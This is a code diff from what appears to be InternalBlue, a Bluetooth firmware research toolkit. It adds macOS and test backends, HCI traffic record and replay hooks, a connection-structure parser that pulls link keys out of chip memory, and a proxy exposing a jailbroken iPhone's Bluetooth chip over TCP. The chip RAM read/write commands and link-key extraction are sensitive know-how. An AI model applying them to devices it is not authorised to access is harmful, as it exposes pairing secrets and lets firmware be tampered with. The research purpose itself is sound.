acl_len = struct.unpack_from("h", self.buffer[3:])[0]
required_len = acl_len + 5
# for HCI cmd data the length is at offset 3 (but just one byte)
elif self.buffer[0] == '\x01':
hci_len = struct.unpack_from("b", self.buffer[3:])[0]
required_len = hci_len + 4
# for HCI event data the length is at offset 2 (one byte)
elif self.buffer[0] == '\x04':
hci_len = struct.unpack_from("b", self.buffer[2:])[0]
required_len = hci_len + 3
# for BCM data the length should always be 64
elif self.buffer[0] == '\x07':
required_len = 64
# if we don't have all the data we need, we just wait for more
if len(self.buffer) < required_len:
#log.info("Not enough data, expected %d, got %d", required_len, len(self.buffer))
return (None, False)
# might be the case that we have too much
elif len(self.buffer) > required_len:
log.info("Got too much data, expected %d, got %d", required_len, len(self.buffer))
surplus = len(self.buffer) - required_len
new_buffer = self.buffer[required_len:len(self.buffer)]
data_out = self.buffer[:-surplus]
#log.info("new_buffer: %s, data_out: %s", new_buffer.encode("hex"), data_out.encode("hex"))
self.buffer = new_buffer
return (data_out, True)
# sometimes we even have just the right amout of data
else:
#log.info("Got exactly the right amount of data")
data_out = self.buffer
self.buffer = ""
return (data_out, False)
else:
return (None, False)
def _recvThreadFunc(self):
log.debug("Receive Thread started.")
if (self.write_btsnooplog):
if self.write_btsnooplog:
log.warn("Writing btsnooplog is not supported with iOS.")
while not self.exit_requested:
@@ -100,33 +156,44 @@ class iOSCore(InternalBlue):
# read record data
try:
record_data = self.s_snoop.recv(1024)
received_data = self.s_snoop.recv(1024)
except socket.timeout:
continue # this is ok. just try again without error
# because the iOS socket is rather unreliable (blame the iOS proxy developer) we
# need to do some length checks and get the H4/HCI data in the right format
#log.info("H4 Data received")
#log.info(received_data.encode('hex'))
(record_data, is_more) = self._getLatestH4Blob(new_data=received_data)
while record_data is not None:
# Put all relevant infos into a tuple. The HCI packet is parsed with the help of hci.py.
record = (hci.parse_hci_packet(record_data), 0, 0, 0, 0, 0)
# Put all relevant infos into a tuple. The HCI packet is parsed with the help of hci.py.
record = (hci.parse_hci_packet(record_data), 0, 0, 0, 0, 0) #TODO not sure if this causes trouble?
log.debug("Recv: " + str(record[0]))
log.debug("Recv: " + str(record[0]))
# Put the record into all queues of registeredHciRecvQueues if their
# filter function matches.
for queue, filter_function in self.registeredHciRecvQueues: # TODO filter_function not working with bluez modifications
try:
queue.put(record, block=False)
except queue.Full:
log.warn("recvThreadFunc: A recv queue is full. dropping packets..")
# Put the record into all queues of registeredHciRecvQueues if their
# filter function matches.
for queue, filter_function in self.registeredHciRecvQueues: # TODO filter_function not working with bluez modifications
try:
queue.put(record, block=False)
except Queue.Full:
log.warn("recvThreadFunc: A recv queue is full. dropping packets..")
# Call all callback functions inside registeredHciCallbacks and pass the
# record as argument.
for callback in self.registeredHciCallbacks:
callback(record)
# Call all callback functions inside registeredHciCallbacks and pass the
# record as argument.
for callback in self.registeredHciCallbacks:
callback(record)
# Check if the stackDumpReceiver has noticed that the chip crashed.
if self.stackDumpReceiver.stack_dump_has_happend:
# A stack dump has happend!
log.warn("recvThreadFunc: The controller send a stack dump. stopping..")
self.exit_requested = True
# Check if the stackDumpReceiver has noticed that the chip crashed.
if self.stackDumpReceiver.stack_dump_has_happend:
# A stack dump has happend!
log.warn("recvThreadFunc: The controller send a stack dump. stopping..")
self.exit_requested = True
(record_data, is_more) = self._getLatestH4Blob()
if not is_more:
break
log.debug("Receive Thread terminated.")
internalblue/macoscore.py
+192
View File
@@ -0,0 +1,192 @@
#!/usr/bin/env python2
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import str
import socket
import queue as queue2k
from . import hci
from pwn import *
from .core import InternalBlue
import binascii
import os
filepath = os.path.dirname(os.path.abspath(__file__))
class macOSCore(InternalBlue):
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory=".", replay=False):
super(macOSCore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory=".", replay=replay)
self.doublecheck = False
self.iobe = None
self.serial = None
if not replay:
import objc
objc.initFrameworkWrapper("IOBluetoothExtended",
frameworkIdentifier="de.tu-darmstadt.seemoo.IOBluetoothExtended",
frameworkPath=objc.pathForFramework(
filepath + "/../macos-framework/IOBluetoothExtended.framework"),
globals=globals())
self.hciport = -1
def device_list(self):
"""
Get a list of connected devices
"""
if self.exit_requested:
self.shutdown()
if self.running:
log.warn("Already running. Call shutdown() first!")
return []
# assume that a explicitly specified iPhone exists
device_list = [(self, "mac", "mac")]
return device_list
def local_connect(self):
if not self._setupSockets():
log.critical("No connection to target device.")
self._teardownSockets()
return True
def _setupSockets(self):
self.hciport = random.randint(60000, 65535-1)
log.debug("_setupSockets: Selected random ports snoop=%d and inject=%d" % (self.hciport, self.hciport + 1))
log.info("Wireshark configuration (on Loopback interface): udp.port == %d || udp.port == %d" % (self.hciport, self.hciport + 1))
# Create s_snoop socket
self.s_snoop = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s_snoop.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s_snoop.bind(('127.0.0.1', self.hciport))
self.s_snoop.settimeout(0.5)
self.s_snoop.setblocking(True)
# Create s_inject
self.s_inject = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s_inject.settimeout(0.5)
self.s_inject.setblocking(True)
# Create IOBluetoothExtended Object that listens for commands,
# sends them to the Bluetooth chip and replies via UDP socket.
if not self.replay:
self.iobe = IOBE.alloc().initWith_and_(str(self.hciport+1), str(self.hciport))
else:
self.iobe = None
time.sleep(0.5)
return True
def _recvThreadFunc(self):
log.debug("Receive Thread started.")
while not self.exit_requested:
# Little bit ugly: need to re-apply changes to the global context to the thread-copy
context.log_level = self.log_level
# read record data
try:
data, addr = self.s_snoop.recvfrom(1024)
record_data = bytearray(data)
except socket.timeout:
continue # this is ok. just try again without error
if not self.exit_requested:
# Put all relevant infos into a tuple. The HCI packet is parsed with the help of hci.py.
record = (hci.parse_hci_packet(record_data), 0, 0, 0, 0, 0) #TODO not sure if this causes trouble?
log.debug("Recv: " + str(record[0]))
# Put the record into all queues of registeredHciRecvQueues if their
# filter function matches.
for queue, filter_function in self.registeredHciRecvQueues: # TODO filter_function not working with bluez modifications
try:
queue.put(record, block=False)
except queue.Full:
log.warn("recvThreadFunc: A recv queue is full. dropping packets..>" + record_data)
# Call all callback functions inside registeredHciCallbacks and pass the
# record as argument.
for callback in self.registeredHciCallbacks:
callback(record)
log.debug("Receive Thread terminated.")
def _sendThreadFunc(self):
log.debug("Send Thread started.")
while not self.exit_requested:
# Little bit ugly: need to re-apply changes to the global context to the thread-copy
context.log_level = self.log_level
# Wait for 'send task' in send queue
try:
task = self.sendQueue.get(timeout=0.5)
except queue2k.Empty:
continue
# Extract the components of the task
h4type, data, queue, filter_function = task
# Prepend UART TYPE and length.
out = p8(h4type) + p8(len(data)) + data
# Send command to the chip using IOBluetoothExtended framework
h4type, data, queue, filter_function = task
data = bytearray(data)
opcode = format(data[1], '02x') + format(data[0], '02x')
log.debug("Sending command: 0x" + ''.join(format(x, '02x') for x in data) + ", opcode: " + opcode)
if not(h4type == 0x01 or h4type == 0x02):
log.warn("H4 Type {0} not supported by macOS Core!".format(str(h4type)))
if queue is not None:
queue.put(None)
continue
# if the caller expects a response: register a queue to receive the response
if queue is not None and filter_function is not None:
recvQueue = queue2k.Queue(1)
self.registerHciRecvQueue(recvQueue, filter_function)
# Sending command
self.s_inject.sendto(out, ('127.0.0.1', self.hciport+1))
# if the caller expects a response:
# Wait for the HCI event response by polling the recvQueue
if queue is not None and filter_function is not None:
try:
record = recvQueue.get(timeout=10)
hcipkt = record[0]
data = hcipkt.data
except queue2k.Empty:
log.warn("_sendThreadFunc: No response from the firmware.")
data = None
self.unregisterHciRecvQueue(recvQueue)
continue
queue.put(data)
self.unregisterHciRecvQueue(recvQueue)
log.debug("Send Thread terminated.")
def _teardownSockets(self):
if self.s_inject is not None:
self.s_inject.close()
self.s_inject = None
if self.s_snoop is not None:
self.s_snoop.close()
self.s_snoop = None
return True
def shutdown(self):
if not self.replay:
self.iobe.shutdown()
self.s_inject.sendto(b'', ('127.0.0.1', self.s_snoop.getsockname()[1]))
super(macOSCore, self).shutdown()
internalblue/objects/__init__.py
View File
internalblue/objects/connection_information.py
+68
View File
@@ -0,0 +1,68 @@
from builtins import object
from pwnlib.util.packing import u32, u16, u8
class ConnectionInformation(object):
connection_handle = 0
connection_number = 0
master_of_connection = False
remote_name_address = 0
remote_address = None
id = None
public_rand = None
extended_lmp_feat = None
link_key = None
tx_pwr_lvl_dBm = 0
effective_key_len = 0
host_supported_feat = None
def __init__(self, connection_number, remote_address, remote_name_address, master_of_connection, connection_handle,
public_rand, effective_key_len, link_key, tx_pwr_lvl_dBm, extended_lmp_feat, host_supported_feat, id):
self.connection_number = connection_number
self.remote_address = remote_address
self.remote_name_address = remote_name_address
self.master_of_connection = master_of_connection
self.connection_handle = connection_handle
self.public_rand = public_rand
self.effective_key_len = effective_key_len
self.link_key = link_key
self.tx_pwr_lvl_dBm = tx_pwr_lvl_dBm
self.extended_lmp_feat = extended_lmp_feat
self.host_supported_feat = host_supported_feat
self.id = id
@staticmethod
def from_connection_buffer(connection):
# Possible TODO: Convert this to a Katai Struct parser with a proper .ksy grammar.
return ConnectionInformation(u32(connection[:4]), connection[0x28:0x2E][::-1],
u32(connection[0x4C:0x50]),
u32(connection[0x1C:0x20]) & 1 << 15 == 0,
u16(connection[0x64:0x66]),
connection[0x78:0x88],
u8(connection[0xa7:0xa8]),
connection[0x68:0x68 + u8(connection[0xa7:0xa8])],
u8(connection[0x9c:0x9d]) - 127,
connection[0x30:0x38], connection[0x38:0x40],
connection[0x0c:0x0d])
# For some reason the following doesn't work because some attributes like link_key end up as one element tuples
# connection_number = u32(connection[:4])
# remote_address = connection[0x28:0x2E][::-1],
# remote_name_address = u32(connection[0x4C:0x50])
# master_of_connection = u32(connection[0x1C:0x20]) & 1 << 15 == 0
# connection_handle = u16(connection[0x64:0x66])
# public_rand = connection[0x78:0x88]
# effective_key_len = u8(connection[0xa7:0xa8])
# link_key = connection[0x68:0x68 + effective_key_len],
# tx_pwr_lvl_dBm = u8(connection[0x9c:0x9d]) - 127,
# extended_lmp_feat = connection[0x30:0x38]
# host_supported_feat = connection[0x38:0x40]
# id = connection[0x0c:0x0d]
# return ConnectionInformation(connection_number, remote_address, remote_name_address, master_of_connection,
# connection_handle,
# public_rand, effective_key_len, link_key, tx_pwr_lvl_dBm, extended_lmp_feat,
# host_supported_feat, id)
def __getitem__(self, item):
# type: (str) -> Any
return vars(self)[item]
internalblue/objects/queue_element.py
+39
View File
@@ -0,0 +1,39 @@
from builtins import object
class QueueElement(object):
index = 0
next_item = 0
prev = 0
capacity = 0
name = ''
queue_buf_start = 0
available_items = 0
item_size = 0
next_free_slot = 0
free_slots = 0
address = 0
waitlist_length = 0
next = 0
queue_buf_end = 0
thread_waitlist = 0
def __init__(self, index, address, item_size, capacity, available_items, free_slots, queue_buf_start, queue_buf_end,
next_item, next_free_slot, thread_waitlist, waitlist_length, next, prev, name):
self.index = index
self.next_item = next_item
self.prev = prev
self.capacity = capacity
self.name = name
self.queue_buf_start = queue_buf_start
self.available_items = available_items
self.item_size = item_size
self.next_free_slot = next_free_slot
self.free_slots = free_slots
self.address = address
self.waitlist_length = waitlist_length
self.next = next
self.queue_buf_end = queue_buf_end
self.thread_waitlist = thread_waitlist
def __getitem__(self, item):
# type: (str) -> Any
return vars(self)[item]
internalblue/socket_hooks.py
+307
View File
@@ -0,0 +1,307 @@
from __future__ import print_function
from builtins import object
import binascii
import time
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple, Dict, Type
except ImportError:
pass
class SocketRecvHook(object):
def __init__(self, socket):
# type: (socket.socket) -> None
self.snoop_socket = socket
self.replace = False
def recv_hook(self, data):
raise NotImplementedError("recv_hook not implemented")
def recv_replace(self, length, **kwargs):
raise NotImplementedError("recv_replace not implemented")
def recv(self, length, **kwargs):
if not self.replace:
data = self.snoop_socket.recv(length, **kwargs)
else:
data = self.recv_replace(length, **kwargs)
self.recv_hook(data)
return data
def recvfrom_replace(self, length, **kwargs):
raise NotImplementedError("recvfrom_replace not implemented")
def recvfrom_hook(self, data, addr):
raise NotImplementedError("recvfrom_hook not implemented")
def recvfrom(self, length, **kwargs):
# type: (int, Dict[str, Any]) -> Tuple[bytes, Any]
if not self.replace:
data, addr = self.snoop_socket.recvfrom(length)
else:
data, addr = self.recvfrom_replace(length, **kwargs)
self.recvfrom_hook(data, addr)
return data, addr
class SocketInjectHook(object):
def __init__(self, socket, core):
# type: (socket.socket, InternalBlue) -> None
self.inject_socket = socket
self.replace = False
self.core = core # type: InternalBlue
def close(self):
if self.inject_socket:
self.inject_socket.close()
def send(self, data):
self.send_hook(data)
if not self.replace:
try:
self.inject_socket.send(data)
except Exception as e:
self.send_exception(e)
self.core.test_failed = e
raise
else:
try:
self.send_replace(data)
except Exception as e:
self.core.test_failed = e
raise
def sendto(self, data, socket):
self.sendto_hook(data, socket)
if not self.replace:
try:
self.inject_socket.sendto(data, socket)
except Exception as e:
self.send_exception(e)
self.core.test_failed = e
raise
else:
try:
self.send_replace(data)
except Exception as e:
self.core.test_failed = e
raise
def getsockname(self):
return self.snoop_socket.getsockname()
def send_hook(self, result):
raise NotImplementedError("send_hook not implemented")
def sendto_hook(self, data, socket):
raise NotImplementedError("sendto_hook not implemented")
def send_replace(self, data):
raise NotImplementedError("send_replace not implemented")
def send_exception(self, e):
raise NotImplementedError("send_exception not implemented")
class SocketDuplexHook(SocketInjectHook, SocketRecvHook):
def __init__(self, snoop_socket, inject_socket, core, **kwargs):
# type: (socket.socket, socket.socket, InternalBlue, Dict[str, Any]) -> None
self.snoop_socket = snoop_socket
self.inject_socket = inject_socket
self.replace = False
self.core = core
pass
class HookBase(object):
def send_hook(self, data):
raise NotImplementedError
def recv_hook(self, data):
raise NotImplementedError
class TraceToFileHook(SocketDuplexHook):
def __init__(self, snoop_socket, inject_socket, core, filename='/tmp/bt_hci.log'):
# type: (socket.socket, socket.socket, InternalBlue, str) -> None
SocketDuplexHook.__init__(self, snoop_socket, inject_socket, core)
self.file = open(filename, 'a')
self.replace = False
self.log = []
self.closed = False
def recv_hook(self, data):
line = "RX {}\n".format(binascii.hexlify(data))
print(line)
self.log.append(line)
def send_hook(self, data):
line = "TX {}\n".format(binascii.hexlify(data))
print(line)
self.log.append(line)
def recvfrom_hook(self, data, socket, **kwargs):
line = "RX {}\n".format(binascii.hexlify(data))
print(line)
self.log.append(line)
def sendto_hook(self, data, socket, **kwargs):
line = "TX {}\n".format(binascii.hexlify(data))
print(line)
self.log.append(line)
def send_exception(self, e):
line = "EX '{}'\n".format(e)
print(line)
self.log.append(line)
def close(self):
if not self.closed:
self.inject_socket.close()
self.snoop_socket.close()
self.log.append("Socket closed\n")
self.file.writelines(self.log)
self.file.close()
self.closed = True
import socket
class PrintTrace(SocketDuplexHook):
def send_hook(self, data, **kwargs):
print("Sent: {}".format(binascii.hexlify(data)))
def recv_hook(self, data, **kwargs):
print("Recv: {}".format(binascii.hexlify(data)))
def recvfrom_hook(self, data, addr, **kwargs):
print("Recv: {}".format(binascii.hexlify(data)))
def sendto_hook(self, data, socket, **kwargs):
print("Sent: {}".format(binascii.hexlify(data)))
def send_exception(self, e):
print("Exception: {}".format(e))
class ReplaySocket(SocketDuplexHook):
def __init__(self, snoop_socket, inject_socket, core, filename='/tmp/bt_hci.log', debug=False):
SocketDuplexHook.__init__(self, snoop_socket, inject_socket, core)
self.replace = True
self.log = open(filename).readlines()
self.index = 0
self.debug = debug
if self.log[0].startswith("#"):
self.index = 1
def send_hook(self, data, **kwargs):
if self.debug:
print("Sent: {}".format(binascii.hexlify(data)))
def recv_hook(self, data, **kwargs):
if self.debug:
print("Recv: {}".format(binascii.hexlify(data)))
def recvfrom_hook(self, data, addr, **kwargs):
if self.debug:
print("Recv: {}".format(binascii.hexlify(data)))
def sendto_hook(self, data, socket, **kwargs):
if self.debug:
print("Sent: {}".format(binascii.hexlify(data)))
def send_exception(self, e):
if self.debug:
print("Exception: {}".format(e))
def send_replace(self, data, **kwargs):
encoded_data = "" # type: str
hex_data = binascii.hexlify(data)
direction, encoded_data = self.log[self.index].split(" ", 1)
if direction == "RX":
# Some recieves aren't handled yet, wait a bit so the recv thread takes care of them.
time.sleep(0.2)
direction, encoded_data = self.log[self.index].split(" ", 1)
assert (direction == "TX")
log_data = binascii.unhexlify(encoded_data.rstrip('\n'))
assert data == log_data, "Got {}, expected {}".format(hex_data, encoded_data)
self.index += 1
ty, data = self.log[self.index].split(" ", 1)
if ty == "EX":
self.index += 1
raise socket.error(data)
def recv_replace(self, length, **kwargs):
time.sleep(0.001)
direction, encoded_data = self.log[self.index].split(" ", 1)
if direction == "RX":
self.index += 1
return binascii.unhexlify(encoded_data.rstrip('\n'))
else:
raise socket.timeout()
def recvfrom_replace(self, length, **kwargs):
time.sleep(0.001)
direction, encoded_data = self.log[self.index].split(" ", 1)
if direction == "RX":
self.index += 1
return binascii.unhexlify(encoded_data.rstrip('\n')), 1234
else:
raise socket.timeout()
def getsockname(self):
return (None, 0)
def close(self):
assert self.index + 1 == len(self.log)
from internalblue.core import InternalBlue
def hook(core, socket_hook, **hookkwargs):
# type: (Type[InternalBlue], Type[SocketDuplexHook], Any) -> None
def wrap_socket_setup(orig_func):
def wrapped_socket_setup(self, *args, **kwargs):
if not self.replay:
status = orig_func(self, *args, **kwargs)
else:
status = True
h = socket_hook(self.s_snoop, self.s_inject, core=self, **hookkwargs)
self.s_inject = h
self.s_snoop = h
return status
return wrapped_socket_setup
core._setupSockets = wrap_socket_setup(core._setupSockets)
def wrap_teardown_sockets(orig_func):
def wrapped_teardown_sockets(self, *args, **kwargs):
if not self.replay:
return orig_func(self, *args, **kwargs)
else:
self.s_inject.close()
self.s_snoop.close()
return wrapped_teardown_sockets
core._teardownSockets = wrap_teardown_sockets(core._teardownSockets)
def wrap_device_list(orig_func):
def wrapped_device_list(self, *args, **kwargs):
if not self.replay:
return orig_func(self, *args, **kwargs)
else:
return [(self, "ReplayDevice", "ReplayDevice")]
return wrapped_device_list
core.device_list = wrap_device_list(core.device_list)
internalblue/testcore.py
+163
View File
@@ -0,0 +1,163 @@
#!/usr/bin/env python2
from __future__ import print_function
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
import socket
import queue as queue2k
from . import hci
from pwn import *
from .core import InternalBlue
import binascii
filepath = os.path.dirname(os.path.abspath(__file__))
try:
import typing
from typing import List, Tuple, Any
from internalblue.core import InternalBlue
except:
pass
class testCore(InternalBlue):
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory="."):
super(testCore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory=".")
file = open(filepath+'/../dummymemdump.bin', mode='rb')
self.memory = file.read()
file.close()
self.doublecheck = False
def device_list(self):
# type: () -> List[Tuple[InternalBlue,str,str]]
"""
Get a list of connected devices
"""
if self.exit_requested:
self.shutdown()
if self.running:
log.warn("Already running. Call shutdown() first!")
return []
# assume that a explicitly specified iPhone exists
device_list = [(self, "Testchip", "Testchip")]
return device_list
def sendH4(self, h4type, data, timeout=2):
"""
Send an arbitrary HCI packet by pushing a send-task into the
sendQueue. This function blocks until the response is received
or the timeout expires. The return value is the Payload of the
HCI Command Complete Event which was received in response to
the command or None if no response was received within the timeout.
"""
queue = queue2k.Queue(1)
try:
self.sendQueue.put((h4type, data, queue, None), timeout=timeout)
ret = queue.get(timeout=timeout)
return ret
except queue2k.Empty:
log.warn("sendH4: waiting for response timed out!")
return None
except queue.Full:
log.warn("sendH4: send queue is full!")
return None
def local_connect(self):
return True
def _setupSockets(self):
self.hciport = random.randint(60000, 65535 - 1)
log.debug("_setupSockets: Selected random ports snoop=%d and inject=%d" % (self.hciport, self.hciport + 1))
log.info("Wireshark configuration (on Loopback interface): udp.port == %d || udp.port == %d" % (
self.hciport, self.hciport + 1))
# Create s_snoop socket
self.s_snoop = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s_snoop.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s_snoop.bind(('127.0.0.1', self.hciport))
self.s_snoop.settimeout(0.5)
self.s_snoop.setblocking(True)
# Create s_inject
self.s_inject = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s_inject.settimeout(0.5)
self.s_inject.setblocking(True)
time.sleep(1.5)
return True
def _recvThreadFunc(self):
log.debug("Receive Thread terminated.")
def _sendThreadFunc(self):
log.debug("Send Thread started.")
while not self.exit_requested:
# Little bit ugly: need to re-apply changes to the global context to the thread-copy
context.log_level = self.log_level
# Wait for 'send task' in send queue
try:
task = self.sendQueue.get(timeout=0.5)
except queue2k.Empty:
continue
# Extract the components of the task
h4type, data, queue, filter_function = task
# Prepend UART TYPE and length.
out = p8(h4type) + p8(len(data)) + data
# Send command to the chip using IOBluetoothExtended framework
h4type, data, queue, filter_function = task
opcode = binascii.hexlify(data[1]) + binascii.hexlify(data[0])
log.debug("Sending command: 0x" + binascii.hexlify(data))
# if the caller expects a response: register a queue to receive the response
if queue is not None and filter_function is not None:
recvQueue = queue2k.Queue(1)
self.registerHciRecvQueue(recvQueue, filter_function)
# if the caller expects a response:
# Wait for the HCI event response by polling the recvQueue
if queue is not None and filter_function is not None:
# Return responses according to the opcode & operands
if opcode == '1001':
record_data = '040E0C0101100006b415060f000e22'.decode('hex')
data = hci.parse_hci_packet(record_data).data
elif opcode == 'fc4d':
length = int(binascii.hexlify(data[7]), 16)
address = int(binascii.hexlify(data[6]+data[5]+data[4]+data[3]), 16)
data = '014dfc00'.decode('hex') + self.memory[address:address+length]
elif opcode == 'fc4c':
log.info(data.encode('hex'))
length = int(binascii.hexlify(data[2]), 16)
address = int(binascii.hexlify(data[6]+data[5]+data[4]+data[3]), 16)
self.memory = self.memory[:address] + data[7:len(data)] + self.memory[address+length:]
else:
print(opcode)
queue.put(data)
self.unregisterHciRecvQueue(recvQueue)
log.debug("Send Thread terminated.")
def enableBroadcomDiagnosticLogging(self, enable):
return
def _teardownSockets(self):
return True
def shutdown(self):
return True
internalblue/utils.py
+3
View File
@@ -0,0 +1,3 @@
def bytes_to_hex(bytes):
# type: (bytearray) -> str
return ''.join(format(x, '02x') for x in bytearray(bytes))
ios-proxy/README.md
+24 -6
View File
@@ -1,5 +1,9 @@
# internalblue-ios-proxy
This project is a proxy that redirects iOS's bluetooth socket and exposes it as a TCP socket which can be used to send HCI commands to the bluetooth controller of the device. A jailbroken device is required. To compile the project, a Mac with xcode is required.
This project is a proxy that redirects the *iOS* Bluetooth socket and exposes it as a
TCP socket which can be used to send HCI commands to the Bluetooth controller of the device.
A jailbroken device is required. To compile the project, a Mac with xcode is required.
The precompiled `ios-proxy` binary was tested on the iPhone 6 (12.1.2, 12.4), iPhone SE (12.4),
iPhone 7 (12.1.2, 12.4), and iPhone X (12.4).
## Building internalblue-ios-proxy
Open the project with xcode and compile it. Xcode will create a single binary that can then be transferred onto the device.
@@ -7,14 +11,28 @@ Open the project with xcode and compile it. Xcode will create a single binary th
## Installing internalblue-ios-proxy
1. Right-click the `internalblue-ios-proxy` binary and click "Show in Finder". This will open the location the compiled binary resides in.
2. Move the binary onto the device (e.g. with scp) at a location where applications are allowed to be executed (e.g. `/bin` or `/sbin`).
3. The binary needs the `platform-application` entitlement. This is achieved by signing the binary with the included `entitlements.xml` file. Sign it using `ldid -Sentitlements.xml internalblue-ios-proxy`. `ldid` should be on a jailbroken device with Cydia by default.
3. The binary needs the `platform-application` entitlement. This is achieved by signing the binary with the included `entitlements.xml` file.
Sign it using `ldid -Sentitlements.xml internalblue-ios-proxy`. `ldid` should be on a jailbroken device with Cydia by default.
If `ldid` was not installed with your jailbreak, try opening [sileo://package/ldid](sileo://package/ldid).
## Running internalblue-ios-proxy
Run the proxy by executing `internalblue-ios-proxy <port-number>`. The phone will then listen on this port and can be accessed either when on the same WiFi or by proxying the port through USB (using [usbmuxd](https://iphonedevwiki.net/index.php/SSH_Over_USB)).
Run the proxy by executing `internalblue-ios-proxy <port-number>`.
The phone will then listen on this port and can be accessed either when on the same Wi-Fi or
by proxying the port through USB (using [usbmuxd](https://iphonedevwiki.net/index.php/SSH_Over_USB)).
When enabling a personal hotspot, you can also run `dhclient` on *Linux* on the new local ethernet interface.
A few things to note:
- to increase reliability of the proxy, bluetooth should be disabled (either by manually stopping the bluetoothd daemon or by shutting of bluetooth in the settings on the phone)
- in case the bluetooth chip crashes or does not respond anymore over the proxy, the proxy should be stopped and bluetooth should be turned off and on again in the UI
- sometimes the bluetooth socket will not respond anymore after establishing a second connection, just restart the proxy then.
- To increase reliability of the proxy, *Bluetooth should be disabled*
(either by manually stopping the Bluetooth daemon or by shutting of Bluetooth in the
settings on the phone). Despite shutting down Bluetooth, the RAM will still have the same contents
as during previous usage, and you can analyze it.
- The current implementation sometimes returns wrong results, thus we double-check results of
commands that read ROM/RAM. We show warnings, but firmware dumps should complete nonetheless.
- To get sufficient performance, access the `ios-proxy` over USB and not using Wi-Fi.
- In case the Bluetooth chip crashes or does not respond anymore over the proxy,
the proxy should be stopped and Bluetooth should be turned off and on again in the UI.
- Sometimes the Bluetooth socket will not respond anymore after establishing a second connection,
just restart the proxy then.
This project is based on Brandon Azad's [iOS command line tool](https://github.com/bazad/ios-command-line-tool) template.
ios-proxy/internalblue-ios-proxy/internalblue-ios-proxy.c
+66 -87
View File
@@ -50,7 +50,7 @@ int connect_bt_device() {
struct termios term;
if (socket_fd == 0) {
printf("unable to get bluetooth socket\n");
printf("[!] Unable to get Bluetooth socket\n");
return -1;
}
@@ -58,8 +58,8 @@ int connect_bt_device() {
ctl_inf->ctl_id = 0;
strcpy(ctl_inf->ctl_name, "com.apple.uart.bluetooth");
if ((error = ioctl(socket_fd, CTLIOCGINFO, ctl_inf))) {
printf("ioctl(CTLIOCGINFO) = %d - errno: %d\n", error, errno);
printf("error: %s\n", strerror(errno));
printf("[!] ioctl(CTLIOCGINFO) = %d - errno: %d\n", error, errno);
printf("[!] error: %s\n", strerror(errno));
return -1;
}
@@ -67,27 +67,27 @@ int connect_bt_device() {
*(int *)&sock_addr.sa_data[2] = ctl_inf->ctl_id;
ret = connect(socket_fd, &sock_addr, 0x20);
if (ret != 0) {
printf("connect() = %d - errno: %d\n", ret, errno);
printf("error: %s\n", strerror(errno));
printf("[!] connect() = %d - errno: %d\n", ret, errno);
printf("[!] error: %s\n", strerror(errno));
return -1;
}
printf("Connected to bt device\n");
printf("[*] Connected to Bluetooth chip H4 socket\n");
socklen_t len = 72;
ret = getsockopt(socket_fd, 2, TIOCGETA, &term, &len);
if (ret != 0) {
printf("getsockopt(TIOCGETA) = %d - errno: %d\n", ret, errno);
printf("error: %s\n", strerror(errno));
printf("[!] getsockopt(TIOCGETA) = %d - errno: %d\n", ret, errno);
printf("[!] error: %s\n", strerror(errno));
return -1;
}
cfmakeraw(&term);
ret = cfsetspeed(&term, 3000000);
if (ret != 0) {
printf("cfsetspeed() = %d - errno: %d\n", ret, errno);
printf("error: %s\n", strerror(errno));
printf("[!] cfsetspeed() = %d - errno: %d\n", ret, errno);
printf("[!] error: %s\n", strerror(errno));
return -1;
}
@@ -95,13 +95,12 @@ int connect_bt_device() {
term.c_cflag = 232192;
ret = setsockopt(socket_fd, 2, TIOCSETA, &term, 0x48);
if (ret != 0) {
printf("setsockopt() = %d - errno: %d\n", ret, errno);
printf("error: %s\n", strerror(errno));
printf("[!] setsockopt() = %d - errno: %d\n", ret, errno);
printf("[!] error: %s\n", strerror(errno));
return -1;
}
tcflush(socket_fd, 3);
free(ctl_inf);
return socket_fd;
@@ -115,7 +114,7 @@ int create_server(int port) {
server_fd = socket(AF_INET, SOCK_STREAM, 0);
if (server_fd < 0) {
printf("Unable to create server socket\n");
printf("[!] Unable to create server socket\n");
return -1;
}
@@ -127,16 +126,16 @@ int create_server(int port) {
setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &on, 4);
if (bind(server_fd, (struct sockaddr *)&server, sizeof(server)) < 0) {
printf("Error binding socket\n");
printf("[!] Error binding socket\n");
return -1;
}
if (listen(server_fd, 5) < 0) {
printf("Failed listening: %s\n", strerror(errno));
printf("[!] Failed listening on port %d, Error: %s\n", port, strerror(errno));
return -1;
}
printf("Listening on port %d\n", port);
printf("[*] Listening on port %d\n", port);
return server_fd;
}
@@ -150,82 +149,58 @@ int wait_for_connection(int server_fd) {
client_fd = accept(server_fd, (struct sockaddr *)&client, (socklen_t *)&len);
if (client_fd < 0) {
printf("Accepting connection failed\n");
printf("[!] Accepting connection failed\n");
return -1;
}
return client_fd;
}
size_t buffered_write(int fd, char *buf, int *len)
{
size_t x = write(fd, buf, *len);
if (x < 0)
return x;
if (x == 0)
return x;
if (x != *len)
memmove(buf, buf+x, (*len)-x);
*len -= x;
return x;
}
void proxy_bt_socket(int client, int bt) {
char *client_buf, *bt_buf;
int nfds;
int nfds, x;
fd_set R;
int client_out = 0;
int bt_out = 0;
int x;
size_t n;
client_buf = malloc(1024);
bt_buf = malloc(1024);
client_buf = malloc(0x2000);
bt_buf = malloc(0x2000);
nfds = client > bt ? client : bt;
nfds++;
while(1) {
struct timeval to;
if (client_out) {
buffered_write(bt, client_buf, &client_out);
}
if (bt_out) {
buffered_write(client, bt_buf, &bt_out);
}
FD_ZERO(&R);
if (client_out < 1024)
FD_SET(client, &R);
if (bt_out < 1024)
FD_SET(bt, &R);
FD_SET(client, &R);
FD_SET(bt, &R);
to.tv_sec = 0;
to.tv_usec = 1000;
to.tv_usec = 100;
x = select(nfds+1, &R, 0, 0, &to);
